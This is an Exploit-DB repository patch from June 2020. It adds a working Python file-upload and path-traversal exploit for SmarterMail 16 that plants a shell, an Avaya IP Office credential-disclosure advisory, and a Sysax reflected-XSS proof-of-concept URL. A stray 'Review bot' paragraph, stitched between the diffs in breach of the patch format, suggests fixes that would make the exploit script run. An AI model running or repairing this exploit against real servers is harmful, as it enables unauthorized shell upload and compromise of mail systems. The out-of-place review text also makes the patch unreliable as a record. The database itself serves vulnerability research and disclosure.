From d2b3291be545c86f0a8eda65a411d5b44ae49e3d Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 13 Jun 2020 05:01:56 +0000
Subject: [PATCH] DB: 2020-06-13

3 changes to exploits/shellcodes

Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)
Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)
SmarterMail 16 - Arbitrary File Upload
Avaya IP Office 11 - Password Disclosure
Sysax MultiServer 6.90 - Reflected Cross Site Scripting
---
 exploits/multiple/webapps/48580.py | 134 ++++++++++++++++++++++++++++
 exploits/multiple/webapps/48581.txt | 93 +++++++++++++++++++
 exploits/multiple/webapps/48582.txt | 17 ++++
 files_exploits.csv | 5 +-
 4 files changed, 248 insertions(+), 1 deletion(-)
 create mode 100755 exploits/multiple/webapps/48580.py
 create mode 100644 exploits/multiple/webapps/48581.txt
 create mode 100644 exploits/multiple/webapps/48582.txt

diff --git a/exploits/multiple/webapps/48580.py b/exploits/multiple/webapps/48580.py
new file mode 100755
index 000000000..4b2f40ede
--- /dev/null
+++ b/exploits/multiple/webapps/48580.py
@@ -0,0 +1,134 @@ +# Exploit Title: SmarterMail 16 - Arbitrary File Upload +# Google Dork: inurl:/interface/root +# Date: 2020-06-10 +# Exploit Author: vvhack.org +# Vendor Homepage: https://www.smartertools.com +# Software Link: https://www.smartertools.com +# Version: 16.x +# Tested on: Windows +# CVE : N/A + +#!/usr/bin/python3 +import requests, json, argparse +from requests_toolbelt.multipart.encoder import MultipartEncoder + +#example usage: +#Authenticated +#python3 exp.py -w http://mail.site.com/ -f ast.aspx +#Change username & password ! + +class Tak: + + def __init__(self): + self.file_upload() + self.shell_upload() + + def loginned(self): + self.urls = results.wbsn + '/api/v1/auth/authenticate-user' + self.myobja = {"username":"mail@mail.com","password":"password","language":"en"} + self.xx = requests.post(self.urls, data = self.myobja) + self.data = json.loads(self.xx.text) + self.das = self.data['accessToken'] + self.headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0', 'Authorization': "Bearer " + self.das} + + def loginned_folder(self): + self.loginned() + self.url = results.wbsn + '/api/v1/mail/messages' + myobj = {"folder":"drafts","ownerEmailAddress":"","sortType":5,"sortAscending":"false","query":"","skip":0,"take":151,"selectedIds":[]} + x = requests.post(self.url, data = myobj, headers=self.headers) + print(x.text) + + def create_folder(self): + self.loginned() + self.urlz = results.wbsn + '/api/v1/filestorage/folder-put' + myobj = {"folder": "testos1", "parentFolder":"Root Folder\\"} + myobj2= {"folder": "testos2", "parentFolder":"Root Folder\\"} + x = requests.post(self.urlz, data = myobj, headers=self.headers) + x = requests.post(self.urlz, data = myobj2, headers=self.headers) + print(x.text) + + def file_upload(self): + self.create_folder() + ''' + #resumableChunkNumber=1& + #resumableChunkSize=2097152&resumableCurrentChunkSize=955319&resumableTotalSize=955319& + 
#resumableType=image%2Fjpeg&resumableIdentifier=955319-112097jpg&resumableFilename=112097.jpg& + #resumableRelativePath=112097.jpg&resumableTotalChunks=1", headers={'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0", + #'Accept-Language': "en-US,en;q=0.5", 'Accept-Encoding': "gzip, deflate", + #print(self.xz) + #print(self.xz.headers) + ''' + size = os.path.getsize(results.wbsf) + print(size) + replace_file = results.wbsf.replace(".","") + with open(results.wbsf, "rb") as outf: + contents = outf.read() + multipart_data = MultipartEncoder( + fields={ + "context": "file-storage", + #"contextData": '{"folder":"Root Folder\\ " + str(results.wbsd) + "\\"}', + "contextData": '{"folder":"Root Folder\\\\testos1\\\\"}', + "resumableChunkNumber": "1", + "resumableChunkSize": "2097152", + "resumableCurrentChunkSize": str(size), + "resumableTotalSize": str(size), + "resumableType": "image/jpeg", + #"resumableIdentifier": "955319-112097jpg", + "resumableIdentifier": str(size) + "-" + str(replace_file), + "resumableFilename": results.wbsf, + "resumableRelativePath": results.wbsf, + "resumableTotalChunks": "1", + "file": ( + 'blob',#112097.jpg', + #open(file, "rb"), + contents, + #file, + #"image/jpeg" + "application/octet-stream" + #'text/plain' + ) + + } +) + ''' + http_proxy = "http://127.0.0.1:8080" + proxyDict = { + "http" : http_proxy, + } + ''' + # if you want to activate intercept then add with that argument, this parameter is necessary requiresfunc(if you want to activate it, please remove it from the comment line.) 
>> proxies=proxyDict + self.dre = requests.post(url=results.wbsn + "/api/upload",headers={"Content-Type": multipart_data.content_type, + 'Authorization': "Bearer " + self.das, + 'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"},data=multipart_data) + + def shell_upload(self): + + ''' + http_proxy = "http://127.0.0.1:8080" + proxyDict = { + "http" : http_proxy, + } + ''' + + json_data = { + "folder": "Root Folder\\testos1\\", + "newFolderName": "\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\program files (x86)\\SmarterTools\\SmarterMail\\MRS\\testos1\\", + "parentFolder": "", + "newParentFolder": "Root Folder\\testos2" + } + #r = requests.post('http://mail.site.com/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers, proxies=proxyDict) + r = requests.post(results.wbsn+'/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers) + print(results.wbsn + "/testos1/" + results.wbsf) + +if __name__ == '__main__': + + parser = argparse.ArgumentParser() + parser.add_argument('-f', action='store', dest='wbsf', + help='Filename') + parser.add_argument('-w', action='store', dest='wbsn', + help='Target') + parser.add_argument('--version', action='version', version='SmartMail Knock Knock') + results = parser.parse_args() + + tako = Tak() + tako \ No newline at end of file diff --git a/exploits/multiple/webapps/48581.txt b/exploits/multiple/webapps/48581.txt new file mode 100644 index 000000000..c5ba5835c --- /dev/null +++ b/exploits/multiple/webapps/48581.txt 
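Review bot: `file_upload` calls `os.path.getsize(results.wbsf)` but the import line only brings in `requests, json, argparse` (plus the toolbelt encoder), so the script stops with a NameError at that point; the import line should read `import argparse, json, os` with `import requests` on its own line. The `#!/usr/bin/python3` shebang sits below the header comments and therefore has no effect — a shebang only works as the very first line of the file. `loginned` indexes `json.loads(self.xx.text)['accessToken']` without checking `self.xx.status_code`, so a failed login surfaces as an opaque KeyError instead of a clear message, and the hard-coded `username`/`password` in `self.myobja` belong beside `-f`/`-w` as argparse options rather than in a dict the comment tells the user to edit. The trailing bare `tako` expression on the last line is a no-op and can be dropped.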
@@ -0,0 +1,93 @@
+# Exploit Title: Avaya IP Office 11 - Password Disclosure
+# Exploit Author: hyp3rlinx
+# Date: 2020-06-09
+# Vender Homepage: https://downloads.avaya.com
+# Product Link: https://downloads.avaya.com/css/P8/documents/101067493
+# CVE: CVE-2020-7030
+
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-IP-OFFICE-INSECURE-TRANSIT-PASSWORD-DISCLOSURE.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.avaya.com
+
+
+[Product]
+Avaya IP Office v9.1.8.0 - 11
+
+IP Office Platform provides a single, stackable, scalable small business communications system that grows with your business easily and cost-effectively.
+
+
+[Vulnerability Type]
+Insecure Transit Password Disclosure
+
+
+[CVE Reference]
+CVE-2020-7030
+ASA-2020-077
+
+
+[Security Issue]
+A sensitive information disclosure vulnerability exists in the web interface component of IP Office that
+may potentially allow a local user to gain unauthorized access to the component.
+
+The request URL on port 7071 and the web socket component requests on port 7070 used by Atmosphere-Framework
+within Avaya IP Office, pass Base64 encoded credentials as part of the URL query string.
+
+https://:7071/serveredition/autologin?auth=QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y&referrer=https://x.x.x.x:7070&lang=en_US
+
+wss://:7070/WebManagement/webmanagement/atmosphere/QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y?X-Atmosphere-tracking-id=0&
+X-Atmosphere-Framework=2.0.5-javascript&X-Atmosphere-Transport=websocket&X-Cache-Date=0&Content-Type=text/x-gwt-rpc;%20charset=UTF-8&X-atmo-protocol=true
+
+Base64 credentials: QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y
+Value: Administrator:Administrator
+
+The Base64 encoded credentials can be easily disclosed if the machine used to logon to the web Manager is accessed by an attacker.
+The URL plus the credentials can potentially be leaked or stored in some of the following locations.
+
+Browser History
+Browser Cache
+Browser Developer Tools
+Cached by web proxy
+Referer Header
+Web Logs
+Shared Systems
+
+
+[Avaya Products affected]
+Avaya IP Office 9.x, 10.0 through 10.1.0.7, 11.0 through 11.0.4.2
+
+
+[References]
+https://downloads.avaya.com/css/P8/documents/101067493
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+Medium
+
+
+[Disclosure Timeline]
+Vendor Notification: February 19, 2020
+Vendor confirms issue: March 4, 2020
+Vendor release advisory fix : June 3, 2020
+June 4, 2020 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48582.txt b/exploits/multiple/webapps/48582.txt
new file mode 100644
index 000000000..d52249d0a
--- /dev/null
+++ b/exploits/multiple/webapps/48582.txt
@@ -0,0 +1,17 @@
+ # Exploit Title: Sysax MultiServer 6.90 - Reflected Cross Site Scripting
+# Google Dork: n.d.
+# Date: 2020-06-02
+# Exploit Author: Luca Epifanio (wrongsid3)
+# Vendor Homepage: https://www.sysax.com/
+# Software Link: https://www.sysax.com/download.htm
+# Version: MultiServer 6.90
+# Tested on: Windows 10 x64
+# CVE : CVE-2020-13228
+
+There is reflected XSS via the /scgi sid parameter.
+
+PoC:
+http://192.168.88.131/scgi?sid=684216c78659562c92775c885e956585cdb180fd
+&pid=transferpage2_name1_fff.htm
+
+PoC Screen: https://pasteboard.co/J9eE2GQ.png
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 1364a99ad..9156dcf38 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42802,5 +42802,8 @@ id,file,description,date,author,type,platform,port
 48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php,
 48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,
 48571,exploits/php/webapps/48571.txt,"Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)",2020-06-10,Extinction,webapps,php,
-48572,exploits/php/webapps/48572.txt,"Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php,
+48572,exploits/php/webapps/48572.txt,"Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php,
 48574,exploits/php/webapps/48574.txt,"Virtual Airlines Manager 2.6.2 - 'id' SQL Injection",2020-06-10,Mosaaed,webapps,php,
+48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,
+48581,exploits/multiple/webapps/48581.txt,"Avaya IP Office 11 - Password Disclosure",2020-06-12,hyp3rlinx,webapps,multiple,
+48582,exploits/multiple/webapps/48582.txt,"Sysax MultiServer 6.90 - Reflected Cross Site Scripting",2020-06-12,"Luca Epifanio",webapps,multiple,